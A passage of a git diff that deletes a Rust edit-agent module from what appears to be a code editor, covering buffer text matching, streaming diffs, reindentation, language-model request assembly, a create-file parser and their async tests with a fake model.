- else { - break; - }; - - old_range_tx.send(matcher.push(&chunk, line_hint))?; - if done { - break; - } - } - - let matches = matcher.finish(); - let best_match = matcher.select_best_match(); - - old_range_tx.send(best_match.clone())?; - - let indent = LineIndent::from_iter( - matcher - .query_lines() - .first() - .unwrap_or(&String::new()) - .chars(), - ); - - let resolved_old_texts = if let Some(best_match) = best_match { - vec![ResolvedOldText { - range: best_match, - indent, - }] - } else { - matches - .into_iter() - .map(|range| ResolvedOldText { range, indent }) - .collect::>() - }; - - Ok((edit_events, resolved_old_texts)) - }); - - (task, old_range_rx) - } - - fn compute_edits( - snapshot: BufferSnapshot, - resolved_old_text: ResolvedOldText, - mut edit_events: T, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver<(Range, Arc)>, - ) - where - T: 'static + Send + Unpin + Stream>, - { - let (edits_tx, edits_rx) = mpsc::unbounded(); - let compute_edits = cx.background_spawn(async move { - let buffer_start_indent = snapshot - .line_indent_for_row(snapshot.offset_to_point(resolved_old_text.range.start).row); - let indent_delta = - reindent::compute_indent_delta(buffer_start_indent, resolved_old_text.indent); - - let old_text = snapshot - .text_for_range(resolved_old_text.range.clone()) - .collect::(); - let mut diff = StreamingDiff::new(old_text); - let mut edit_start = resolved_old_text.range.start; - let mut new_text_chunks = - Self::reindent_new_text_chunks(indent_delta, &mut edit_events); - let mut done = false; - while !done { - let char_operations = if let Some(new_text_chunk) = new_text_chunks.next().await { - diff.push_new(&new_text_chunk?) 
- } else { - done = true; - mem::take(&mut diff).finish() - }; - - for op in char_operations { - match op { - CharOperation::Insert { text } => { - let edit_start = snapshot.anchor_after(edit_start); - edits_tx.unbounded_send((edit_start..edit_start, Arc::from(text)))?; - } - CharOperation::Delete { bytes } => { - let edit_end = edit_start + bytes; - let edit_range = - snapshot.anchor_after(edit_start)..snapshot.anchor_before(edit_end); - edit_start = edit_end; - edits_tx.unbounded_send((edit_range, Arc::from("")))?; - } - CharOperation::Keep { bytes } => edit_start += bytes, - } - } - } - - drop(new_text_chunks); - anyhow::Ok(edit_events) - }); - - (compute_edits, edits_rx) - } - - fn reindent_new_text_chunks( - delta: IndentDelta, - mut stream: impl Unpin + Stream>, - ) -> impl Stream> { - let mut reindenter = Reindenter::new(delta); - let mut done = false; - futures::stream::poll_fn(move |cx| { - while !done { - let (chunk, is_last_chunk) = match stream.poll_next_unpin(cx) { - Poll::Ready(Some(Ok(EditParserEvent::NewTextChunk { chunk, done }))) => { - (chunk, done) - } - Poll::Ready(Some(Err(err))) => return Poll::Ready(Some(Err(err))), - Poll::Pending => return Poll::Pending, - _ => return Poll::Ready(None), - }; - - let mut indented_new_text = reindenter.push(&chunk); - // This was the last chunk, push all the buffered content as-is. 
- if is_last_chunk { - indented_new_text.push_str(&reindenter.finish()); - done = true; - } - - if !indented_new_text.is_empty() { - return Poll::Ready(Some(Ok(indented_new_text))); - } - } - - Poll::Ready(None) - }) - } - - async fn request( - &self, - mut conversation: LanguageModelRequest, - intent: CompletionIntent, - prompt: String, - cx: &mut AsyncApp, - ) -> Result>> { - let mut messages_iter = conversation.messages.iter_mut(); - if let Some(last_message) = messages_iter.next_back() - && last_message.role == Role::Assistant - { - let old_content_len = last_message.content.len(); - last_message - .content - .retain(|content| !matches!(content, MessageContent::ToolUse(_))); - let new_content_len = last_message.content.len(); - - // We just removed pending tool uses from the content of the - // last message, so it doesn't make sense to cache it anymore - // (e.g., the message will look very different on the next - // request). Thus, we move the flag to the message prior to it, - // as it will still be a valid prefix of the conversation. - if old_content_len != new_content_len - && last_message.cache - && let Some(prev_message) = messages_iter.next_back() - { - last_message.cache = false; - prev_message.cache = true; - } - - if last_message.content.is_empty() { - conversation.messages.pop(); - } - } - - conversation.messages.push(LanguageModelRequestMessage { - role: Role::User, - content: vec![MessageContent::Text(prompt)], - cache: false, - reasoning_details: None, - }); - - // Include tools in the request so that we can take advantage of - // caching when ToolChoice::None is supported. 
- let mut tool_choice = None; - let mut tools = Vec::new(); - if !conversation.tools.is_empty() - && self - .model - .supports_tool_choice(LanguageModelToolChoice::None) - { - tool_choice = Some(LanguageModelToolChoice::None); - tools = conversation.tools.clone(); - } - - let request = LanguageModelRequest { - thread_id: conversation.thread_id, - prompt_id: conversation.prompt_id, - intent: Some(intent), - messages: conversation.messages, - tool_choice, - tools, - stop: Vec::new(), - temperature: None, - thinking_allowed: self.thinking_allowed, - thinking_effort: None, - speed: None, - }; - - Ok(self.model.stream_completion_text(request, cx).await?.stream) - } -} - -struct ResolvedOldText { - range: Range, - indent: LineIndent, -} - -#[cfg(test)] -mod tests { - use super::*; - use fs::FakeFs; - use futures::stream; - use gpui::{AppContext, TestAppContext}; - use indoc::indoc; - use language_model::fake_provider::FakeLanguageModel; - use pretty_assertions::assert_matches; - use project::{AgentLocation, Project}; - use rand::prelude::*; - use rand::rngs::StdRng; - use std::cmp; - - #[gpui::test(iterations = 100)] - async fn test_empty_old_text(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| { - Buffer::local( - indoc! {" - abc - def - ghi - "}, - cx, - ) - }); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - jkl - def - DEF - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - pretty_assertions::assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - indoc! {" - abc - DEF - ghi - "} - ); - } - - #[gpui::test(iterations = 100)] - async fn test_indentation(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| { - Buffer::local( - indoc! 
{" - lorem - ipsum - dolor - sit - "}, - cx, - ) - }); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - ipsum - dolor - sit - - - ipsum - dolor - sit - amet - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - pretty_assertions::assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - indoc! {" - lorem - ipsum - dolor - sit - amet - "} - ); - } - - #[gpui::test(iterations = 100)] - async fn test_dependent_edits(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - def - - - DEF - - - - DEF - - - DeF - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\nDeF\nghi" - ); - } - - #[gpui::test(iterations = 100)] - async fn test_old_text_hallucination(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! 
{" - - jkl - - - mno - - - - abc - - - ABC - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "ABC\ndef\nghi" - ); - } - - #[gpui::test] - async fn test_edit_events(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let model = agent.model.as_fake(); - let project = agent - .action_log - .read_with(cx, |log, _| log.project().clone()); - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi\njkl", cx)); - - let mut async_cx = cx.to_async(); - let (apply, mut events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut async_cx, - ); - cx.run_until_parked(); - - model.send_last_completion_stream_text_chunk("a"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - None - ); - - model.send_last_completion_stream_text_chunk("bc"); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(0, 0)) - ..buffer.anchor_before(Point::new(0, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("abX"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited(_)] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| 
project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("cY"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk(""); - model.send_last_completion_stream_text_chunk("hall"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("ucinated old"); - model.send_last_completion_stream_text_chunk(""); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::UnresolvedEditRange] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("hallucinated new"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| 
buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("\nghi\nj"); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(2, 0)) - ..buffer.anchor_before(Point::new(2, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("kl"); - model.send_last_completion_stream_text_chunk(""); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(2, 0)) - ..buffer.anchor_before(Point::new(3, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(3, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("GHI"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. 
}] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nGHI" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - - model.end_last_completion_stream(); - apply.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nGHI" - ); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - } - - #[gpui::test] - async fn test_overwrite_events(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let project = agent - .action_log - .read_with(cx, |log, _| log.project().clone()); - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (chunks_tx, chunks_rx) = mpsc::unbounded(); - let (apply, mut events) = agent.overwrite_with_chunks( - buffer.clone(), - chunks_rx.map(|chunk: &str| Ok(chunk.to_string())), - &mut cx.to_async(), - ); - - cx.run_until_parked(); - assert_eq!(drain_events(&mut events).as_slice(), []); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::min_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("```\njkl\n").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. 
}] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("mno\n").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("pqr\n```").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited(_)], - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno\npqr" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - drop(chunks_tx); - apply.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno\npqr" - ); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - } - - #[gpui::test] - async fn test_overwrite_no_content(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (chunks_tx, 
chunks_rx) = mpsc::unbounded::<&str>(); - let (apply, mut events) = agent.overwrite_with_chunks( - buffer.clone(), - chunks_rx.map(|chunk| Ok(chunk.to_string())), - &mut cx.to_async(), - ); - - drop(chunks_tx); - cx.run_until_parked(); - - let result = apply.await; - assert!(result.is_ok(),); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "" - ); - } - - #[gpui::test(iterations = 100)] - async fn test_indent_new_text_chunks(mut rng: StdRng) { - let chunks = to_random_chunks(&mut rng, " abc\n def\n ghi"); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let indented_chunks = - EditAgent::reindent_new_text_chunks(IndentDelta::Spaces(2), new_text_chunks) - .collect::>() - .await; - let new_text = indented_chunks - .into_iter() - .collect::>() - .unwrap(); - assert_eq!(new_text, " abc\n def\n ghi"); - } - - #[gpui::test(iterations = 100)] - async fn test_outdent_new_text_chunks(mut rng: StdRng) { - let chunks = to_random_chunks(&mut rng, "\t\t\t\tabc\n\t\tdef\n\t\t\t\t\t\tghi"); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let indented_chunks = - EditAgent::reindent_new_text_chunks(IndentDelta::Tabs(-2), new_text_chunks) - .collect::>() - .await; - let new_text = indented_chunks - .into_iter() - .collect::>() - .unwrap(); - assert_eq!(new_text, "\t\tabc\ndef\n\t\t\t\tghi"); - } - - #[gpui::test(iterations = 100)] - async fn test_random_indents(mut rng: StdRng) { - let len = rng.random_range(1..=100); - let new_text = util::RandomCharIter::new(&mut rng) - .with_simple_text() - .take(len) - .collect::(); - let new_text = new_text - .split('\n') - 
.map(|line| format!("{}{}", " ".repeat(rng.random_range(0..=8)), line)) - .collect::>() - .join("\n"); - let delta = IndentDelta::Spaces(rng.random_range(-4i8..=4i8) as isize); - - let chunks = to_random_chunks(&mut rng, &new_text); - let new_text_chunks = stream::iter(chunks.iter().enumerate().map(|(index, chunk)| { - Ok(EditParserEvent::NewTextChunk { - chunk: chunk.clone(), - done: index == chunks.len() - 1, - }) - })); - let reindented_chunks = EditAgent::reindent_new_text_chunks(delta, new_text_chunks) - .collect::>() - .await; - let actual_reindented_text = reindented_chunks - .into_iter() - .collect::>() - .unwrap(); - let expected_reindented_text = new_text - .split('\n') - .map(|line| { - if let Some(ix) = line.find(|c| c != ' ') { - let new_indent = cmp::max(0, ix as isize + delta.len()) as usize; - format!("{}{}", " ".repeat(new_indent), &line[ix..]) - } else { - line.to_string() - } - }) - .collect::>() - .join("\n"); - assert_eq!(actual_reindented_text, expected_reindented_text); - } - - fn to_random_chunks(rng: &mut StdRng, input: &str) -> Vec { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let mut chunks = Vec::new(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - chunks.push(input[last_ix..chunk_ix].to_string()); - last_ix = chunk_ix; - } - chunks - } - - fn simulate_llm_output( - agent: &EditAgent, - output: &str, - rng: &mut StdRng, - cx: &mut TestAppContext, - ) { - let executor = cx.executor(); - let chunks = to_random_chunks(rng, output); - let model = agent.model.clone(); - cx.background_spawn(async move { - for chunk in chunks { - executor.simulate_random_delay().await; - model - .as_fake() - .send_last_completion_stream_text_chunk(chunk); - } - model.as_fake().end_last_completion_stream(); - }) - .detach(); - } - - async fn init_test(cx: &mut TestAppContext) -> 
EditAgent { - init_test_with_thinking(cx, true).await - } - - async fn init_test_with_thinking(cx: &mut TestAppContext, thinking_allowed: bool) -> EditAgent { - cx.update(settings::init); - - let project = Project::test(FakeFs::new(cx.executor()), [], cx).await; - let model = Arc::new(FakeLanguageModel::default()); - let action_log = cx.new(|_| ActionLog::new(project.clone())); - EditAgent::new( - model, - project, - action_log, - Templates::new(), - EditFormat::XmlTags, - thinking_allowed, - true, - ) - } - - #[gpui::test(iterations = 10)] - async fn test_non_unique_text_error(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let original_text = indoc! {" - function foo() { - return 42; - } - - function bar() { - return 42; - } - - function baz() { - return 42; - } - "}; - let buffer = cx.new(|cx| Buffer::local(original_text, cx)); - let (apply, mut events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - // When matches text in more than one place - simulate_llm_output( - &agent, - indoc! {" - - return 42; - } - - - return 100; - } - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - // Then the text should remain unchanged - let result_text = buffer.read_with(cx, |buffer, _| buffer.snapshot().text()); - assert_eq!( - result_text, - indoc! 
{" - function foo() { - return 42; - } - - function bar() { - return 42; - } - - function baz() { - return 42; - } - "}, - "Text should remain unchanged when there are multiple matches" - ); - - // And AmbiguousEditRange even should be emitted - let events = drain_events(&mut events); - let ambiguous_ranges = vec![2..3, 6..7, 10..11]; - assert!( - events.contains(&EditAgentOutputEvent::AmbiguousEditRange(ambiguous_ranges)), - "Should emit AmbiguousEditRange for non-unique text" - ); - } - - #[gpui::test] - async fn test_thinking_allowed_forwarded_to_request(cx: &mut TestAppContext) { - let agent = init_test_with_thinking(cx, false).await; - let buffer = cx.new(|cx| Buffer::local("hello\n", cx)); - let (_apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - let pending = agent.model.as_fake().pending_completions(); - assert_eq!(pending.len(), 1); - assert!( - !pending[0].thinking_allowed, - "Expected thinking_allowed to be false when EditAgent is constructed with allow_thinking=false" - ); - agent.model.as_fake().end_last_completion_stream(); - - let agent = init_test_with_thinking(cx, true).await; - let buffer = cx.new(|cx| Buffer::local("hello\n", cx)); - let (_apply, _events) = agent.edit( - buffer, - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - let pending = agent.model.as_fake().pending_completions(); - assert_eq!(pending.len(), 1); - assert!( - pending[0].thinking_allowed, - "Expected thinking_allowed to be true when EditAgent is constructed with allow_thinking=true" - ); - agent.model.as_fake().end_last_completion_stream(); - } - - fn drain_events( - stream: &mut UnboundedReceiver, - ) -> Vec { - let mut events = Vec::new(); - while let Ok(event) = stream.try_recv() { - events.push(event); - } - events - } -} diff --git a/crates/agent/src/edit_agent/create_file_parser.rs 
b/crates/agent/src/edit_agent/create_file_parser.rs deleted file mode 100644 index 2272434d796a92..00000000000000 --- a/crates/agent/src/edit_agent/create_file_parser.rs +++ /dev/null @@ -1,237 +0,0 @@ -use std::sync::OnceLock; - -use regex::Regex; -use smallvec::SmallVec; -use util::debug_panic; - -static START_MARKER: OnceLock = OnceLock::new(); -static END_MARKER: OnceLock = OnceLock::new(); - -#[derive(Debug)] -pub enum CreateFileParserEvent { - NewTextChunk { chunk: String }, -} - -#[derive(Debug)] -pub struct CreateFileParser { - state: ParserState, - buffer: String, -} - -#[derive(Debug, PartialEq)] -enum ParserState { - Pending, - WithinText, - Finishing, - Finished, -} - -impl CreateFileParser { - pub fn new() -> Self { - CreateFileParser { - state: ParserState::Pending, - buffer: String::new(), - } - } - - pub fn push(&mut self, chunk: Option<&str>) -> SmallVec<[CreateFileParserEvent; 1]> { - if chunk.is_none() { - self.state = ParserState::Finishing; - } - - let chunk = chunk.unwrap_or_default(); - - self.buffer.push_str(chunk); - - let mut edit_events = SmallVec::new(); - let start_marker_regex = START_MARKER.get_or_init(|| Regex::new(r"\n?```\S*\n").unwrap()); - let end_marker_regex = END_MARKER.get_or_init(|| Regex::new(r"(^|\n)```\s*$").unwrap()); - loop { - match &mut self.state { - ParserState::Pending => { - if let Some(m) = start_marker_regex.find(&self.buffer) { - self.buffer.drain(..m.end()); - self.state = ParserState::WithinText; - } else { - break; - } - } - ParserState::WithinText => { - let text = self.buffer.trim_end_matches(&['`', '\n', ' ']); - let text_len = text.len(); - - if text_len > 0 { - edit_events.push(CreateFileParserEvent::NewTextChunk { - chunk: self.buffer.drain(..text_len).collect(), - }); - } - break; - } - ParserState::Finishing => { - if let Some(m) = end_marker_regex.find(&self.buffer) { - self.buffer.drain(m.start()..); - } - if !self.buffer.is_empty() { - if !self.buffer.ends_with('\n') { - self.buffer.push('\n'); - 
} - edit_events.push(CreateFileParserEvent::NewTextChunk { - chunk: self.buffer.drain(..).collect(), - }); - } - self.state = ParserState::Finished; - break; - } - ParserState::Finished => debug_panic!("Can't call parser after finishing"), - } - } - edit_events - } -} - -#[cfg(test)] -mod tests { - use super::*; - use indoc::indoc; - use rand::prelude::*; - use std::cmp; - - #[gpui::test(iterations = 100)] - fn test_happy_path(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks("```\nHello world\n```", &mut parser, &mut rng), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_cut_prefix(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - Let me write this file for you: - - ``` - Hello world - ``` - - "}, - &mut parser, - &mut rng - ), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_language_name_on_fences(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - ```rust - Hello world - ``` - - "}, - &mut parser, - &mut rng - ), - "Hello world".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_leave_suffix(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - Let me write this file for you: - - ``` - Hello world - ``` - - The end - "}, - &mut parser, - &mut rng - ), - // This output is malformed, so we're doing our best effort - "Hello world\n```\n\nThe end\n".to_string() - ); - } - - #[gpui::test(iterations = 100)] - fn test_inner_fences(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! 
{" - Let me write this file for you: - - ``` - ``` - Hello world - ``` - ``` - "}, - &mut parser, - &mut rng - ), - // This output is malformed, so we're doing our best effort - "```\nHello world\n```\n".to_string() - ); - } - - #[gpui::test(iterations = 10)] - fn test_empty_file(mut rng: StdRng) { - let mut parser = CreateFileParser::new(); - assert_eq!( - parse_random_chunks( - indoc! {" - ``` - ``` - "}, - &mut parser, - &mut rng - ), - "".to_string() - ); - } - - fn parse_random_chunks(input: &str, parser: &mut CreateFileParser, rng: &mut StdRng) -> String { - let chunk_count = rng.random_range(1..=cmp::min(input.len(), 50)); - let mut chunk_indices = (0..input.len()).choose_multiple(rng, chunk_count); - chunk_indices.sort(); - chunk_indices.push(input.len()); - - let chunk_indices = chunk_indices - .into_iter() - .map(Some) - .chain(vec![None]) - .collect::>>(); - - let mut edit = String::default(); - let mut last_ix = 0; - for chunk_ix in chunk_indices { - let mut chunk = None; - if let Some(chunk_ix) = chunk_ix { - chunk = Some(&input[last_ix..chunk_ix]); - last_ix = chunk_ix; - } - - for event in parser.push(chunk) { - match event { - CreateFileParserEvent::NewTextChunk { chunk } => { - edit.push_str(&chunk); - } - } - } - } - edit - } -} diff --git a/crates/agent/src/edit_agent/edit_parser.rs b/crates/agent/src/edit_agent/edit_parser.rs deleted file mode 100644 index c1aa61e18d4a45..00000000000000 --- a/crates/agent/src/edit_agent/edit_parser.rs +++ /dev/null @@ -1,1094 +0,0 @@ -use anyhow::bail; -use derive_more::{Add, AddAssign}; -use language_model::LanguageModel; -use regex::Regex; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; -use smallvec::SmallVec; -use std::{mem, ops::Range, str::FromStr, sync::Arc}; - -const OLD_TEXT_END_TAG: &str = ""; -const NEW_TEXT_END_TAG: &str = ""; -const EDITS_END_TAG: &str = ""; -const SEARCH_MARKER: &str = "<<<<<<< SEARCH"; -const SEPARATOR_MARKER: &str = "======="; -const REPLACE_MARKER: &str = 
